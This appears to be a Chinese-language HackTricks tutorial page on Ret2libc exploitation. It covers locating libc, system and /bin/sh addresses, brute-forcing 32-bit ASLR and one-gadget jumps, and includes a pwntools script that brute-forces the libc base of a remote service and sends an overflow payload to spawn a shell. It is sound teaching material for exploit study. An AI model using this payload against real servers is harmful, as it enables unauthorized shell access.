Ret2lib

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

基本信息

Ret2Libc的本质是将易受攻击的程序的执行流重定向到共享库中的一个函数(例如systemexecvestrcpy),而不是在堆栈上执行攻击者提供的shellcode。攻击者构造一个有效负载,修改堆栈上的返回地址,使其指向所需的库函数,同时根据调用约定设置任何必要的参数。

示例步骤(简化)

  • 获取要调用的函数的地址(例如system)和要调用的命令(例如/bin/sh)

  • 生成一个ROP链,将第一个参数指向命令字符串,并将执行流传递给函数

查找地址

  • 假设使用的libc是当前机器上的一个,您可以找到它将在内存中加载的位置:

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

如果您想检查ASLR是否正在更改libc的地址,可以执行以下操作:

for i in `seq 0 20`; do ldd ./<bin> | grep libc; done
  • 知道使用的 libc 后,还可以通过以下方法找到 system 函数的偏移量:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
  • 知道使用的libc后,还可以通过以下方法找到字符串 /bin/sh 函数的偏移量:

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

使用 gdb-peda / GEF

知道使用的 libc 后,还可以使用 Peda 或 GEF 来获取 system 函数的地址,exit 函数的地址以及字符串 /bin/sh 的地址:

p system
p exit
find "/bin/sh"

使用 /proc/<PID>/maps

如果进程每次与其通信时都会创建子进程(网络服务器),尝试读取该文件(可能需要使用 root 权限)。

在这里,您可以找到进程内libc 加载的确切位置以及每个子进程将要加载的位置

在这种情况下,它加载在0xb75dc000(这将是 libc 的基地址)

未知的 libc

可能您不知道二进制文件正在加载的 libc(因为它可能位于您无法访问的服务器上)。在这种情况下,您可以利用漏洞来泄漏一些地址并找出使用的 libc 库:

pageLeaking libc address with ROP

您可以在以下位置找到用于此目的的 pwntools 模板:

pageLeaking libc - template

使用 2 个偏移量了解 libc

查看页面 https://libc.blukat.me/ 并使用 libc 中几个函数的地址来找出使用的版本

绕过 32 位 ASLR

这些暴力攻击仅适用于 32 位系统

  • 如果利用是本地的,您可以尝试暴力破解 libc 的基地址(适用于 32 位系统):

for off in range(0xb7000000, 0xb8000000, 0x1000):
  • 如果攻击远程服务器,您可以尝试暴力破解libc函数usleep的地址,将10作为参数传递。如果某个时刻服务器需要额外10秒才能响应,则找到了该函数的地址。

One Gadget

执行一个shell,只需跳转到libc中的一个特定地址

pageOne Gadget

x86 Ret2lib 代码示例

在这个示例中,ASLR暴力破解已集成在代码中,并且易受攻击的二进制文件位于远程服务器上:

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE, could be address of exit()
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive()

x64 Ret2lib 代码示例

查看示例:

pageROP - Return Oriented Programing

ARM64 Ret2lib 示例

在ARM64的情况下,ret指令跳转到x30寄存器指向的位置,而不是栈寄存器指向的位置。因此,这会变得有点复杂。

此外,在ARM64中,一条指令执行其本身的功能(不可能在指令中间跳转并将其转换为新的指令)。

查看示例:

pageRet2lib + Printf leak - arm64

Ret-into-printf(或puts)

这允许通过调用printf/puts并将特定数据放置为参数来从进程中泄漏信息。例如,将puts在GOT中的地址放入puts的执行中将泄漏内存中puts的地址

Ret2printf

这基本上意味着滥用Ret2lib将其转换为printf格式字符串漏洞,通过使用ret2lib调用printf并使用要利用的值(听起来毫无意义,但是可能):

pageFormat Strings

其他示例和参考资料

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

支持HackTricks的其他方式:

最后更新于